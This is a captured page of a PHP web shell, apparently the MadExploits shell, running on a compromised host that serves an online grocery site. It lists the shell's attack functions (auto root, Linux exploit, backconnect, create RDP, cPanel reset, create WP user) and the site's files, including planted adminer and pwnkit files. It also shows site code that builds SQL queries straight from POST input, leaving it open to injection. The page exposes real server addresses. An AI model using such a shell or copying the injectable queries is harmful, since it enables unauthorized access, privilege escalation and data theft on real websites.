Linux server.hostify.co.in 5.14.0-611.49.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Apr 21 16:39:08 EDT 2026 x86_64
Apache
: 162.214.74.213 | : 216.73.217.79
438 Domain
8.2.31
orangegroceries
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
orangegroceries /
public_html /
android /
[ HOME SHELL ]
Name
Size
Permission
Action
profile-image
[ DIR ]
drwxr-xr-x
razorpay-php
[ DIR ]
drwxr-xr-x
aboutus.php
382
B
-rw-r--r--
add_cart.php
1.8
KB
-rw-r--r--
add_wishlist.php
1.51
KB
-rw-r--r--
address_details.php
696
B
-rw-r--r--
addto_cart.php
1.69
KB
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
ads.php
536
B
-rw-r--r--
ba32e21b6ad26e41ca8ff1a64cdb8f...
606.34
KB
-rw-r--r--
best_product.php
1.16
KB
-rw-r--r--
brand.php
533
B
-rw-r--r--
cart_banner.php
536
B
-rw-r--r--
cart_count.php
1.81
KB
-rw-r--r--
category-homepg.php
1.18
KB
-rw-r--r--
category-homepg1.php
763
B
-rw-r--r--
category-homepg2.php
1.09
KB
-rw-r--r--
category.php
536
B
-rw-r--r--
change_password.php
420
B
-rw-r--r--
check_status.php
620
B
-rw-r--r--
checkout.php
2.54
KB
-rw-r--r--
checkout1.php
906
B
-rw-r--r--
city_country.php
711
B
-rw-r--r--
city_spinner.php
738
B
-rw-r--r--
city_state.php
711
B
-rw-r--r--
conform_otp.php
698
B
-rw-r--r--
constant.php
116
B
-rw-r--r--
country_spinner.php
711
B
-rw-r--r--
db_config.php
384
B
-rw-r--r--
delete_cart.php
354
B
-rw-r--r--
delete_cart_item.php
649
B
-rw-r--r--
delete_cart_session.php
667
B
-rw-r--r--
delete_profile.php
336
B
-rw-r--r--
delete_wishlist.php
370
B
-rw-r--r--
enquiry.php
542
B
-rw-r--r--
feacture-product.php
1.16
KB
-rw-r--r--
forgot_password.php
417
B
-rw-r--r--
get_profile.php
2.61
KB
-rw-r--r--
google-login.php
1.05
KB
-rw-r--r--
help_center.php
297
B
-rw-r--r--
home_banner.php
536
B
-rw-r--r--
images.php
572
B
-rw-r--r--
imags.php
548
B
-rw-r--r--
invoice_details.php
1.25
KB
-rw-r--r--
login.php
761
B
-rw-r--r--
my_orders.php
562
B
-rw-r--r--
offers.php
838
B
-rw-r--r--
order_product.php
855
B
-rw-r--r--
order_status.php
2.16
KB
-rw-r--r--
payment_offline.php
3.19
KB
-rw-r--r--
payment_update.php
7.19
KB
-rw-r--r--
privacy-policy.php
381
B
-rw-r--r--
product.php
1.19
KB
-rw-r--r--
product_details.php
520
B
-rw-r--r--
product_wise_detail.php
1.2
KB
-rw-r--r--
promo_code.php
541
B
-rw-r--r--
pwnkit
10.99
KB
-rw-r--r--
razorpay_genid.php
1001
B
-rw-r--r--
register.php
4.74
KB
-rw-r--r--
resend_otp.php
1.11
KB
-rw-r--r--
return-policy.php
388
B
-rw-r--r--
search_product.php
1.15
KB
-rw-r--r--
send_message.php
1.33
KB
-rw-r--r--
session_cart_count.php
1.52
KB
-rw-r--r--
slider.php
394
B
-rw-r--r--
sort_product.php
919
B
-rw-r--r--
state_spinner.php
703
B
-rw-r--r--
sub_category.php
713
B
-rw-r--r--
sub_sub_category.php
720
B
-rw-r--r--
term_condition.php
389
B
-rw-r--r--
upd_userid.php
449
B
-rw-r--r--
update_address.php
670
B
-rw-r--r--
update_detail.php
775
B
-rw-r--r--
update_profile.php
776
B
-rw-r--r--
update_qty.php
437
B
-rw-r--r--
update_shpaddr.php
834
B
-rw-r--r--
update_shpaddress.php
912
B
-rw-r--r--
updsession_qty.php
472
B
-rw-r--r--
user_payment.php
788
B
-rw-r--r--
video.php
6.25
KB
-rw-r--r--
whatsapp_banner.php
540
B
-rw-r--r--
wishlist.php
543
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : order_status.php
<?php use PHPMailer\PHPMailer\PHPMailer; use PHPMailer\PHPMailer\Exception; require '../PHPMailer/Exception.php'; require '../PHPMailer/PHPMailer.php'; require '../PHPMailer/SMTP.php'; include("db_config.php"); if($_SERVER['REQUEST_METHOD']=='POST'){ date_default_timezone_set('Asia/Kolkata'); $date = date('Y-m-d H:i:s'); $user_id = $_POST['user_id']; $order_id = $_POST['order_id']; $message = $_POST['message']; $order_status = $_POST['order_status']; $query ="UPDATE user_payment SET order_status='$order_status',message='$message',cancel_date='$date' WHERE order_id='$order_id' and user_id='$user_id'"; // $query="select * from user_payment where order_id='$order_id' and user_id='$user_id'"; $result = mysqli_query($conn, $query); if($result){ $sql_ptm="select * from user_payment where order_id='$order_id' and user_id='$user_id'"; $result_ptm = mysqli_query($conn, $sql_ptm); $res_ptm= mysqli_fetch_array($result_ptm); $sql_usr=mysqli_query($conn,"select * from user_profile where id='$user_id'"); $res_usr= mysqli_fetch_array($sql_usr); $response['data']=$res_ptm; $order_status=$res_ptm['order_status']; $order_id=$res_ptm['order_id']; $messagess=$res_ptm['message']; $cancel_date=$res_ptm['cancel_date']; $name=$res_usr['fname']; $message = "<table> <tr> <td> <h3>Hi Team</h3> <p> Order Cancel By ". $name ."</p> <p> Order Id Is ". $order_id ."</p> <p><span>Order Cancel Reason : ".$messagess." , </span></p> <p><span>Cancel date : ".$cancel_date." , </span></p> </td> </tr> </table>"; $email = new PHPMailer(); $email->Body = ($message); $email->SetFrom('support@orangegroceries.com', 'Orange Groceries'); //Name is optional $email->Subject = "Order Cancel By " .$name ; $email->IsHTML(true); $email->Body = ($message); $email->AddAddress('support@orangegroceries.com'); if (! $email->Send()) { // echo "Problem in sending email!"; // echo "Mailer Error: " . $mail->ErrorInfo; } else { // echo "email sended!"; } $response['status']=1; } else { $response['status']=0; } echo json_encode($response); mysqli_close($conn); }
Close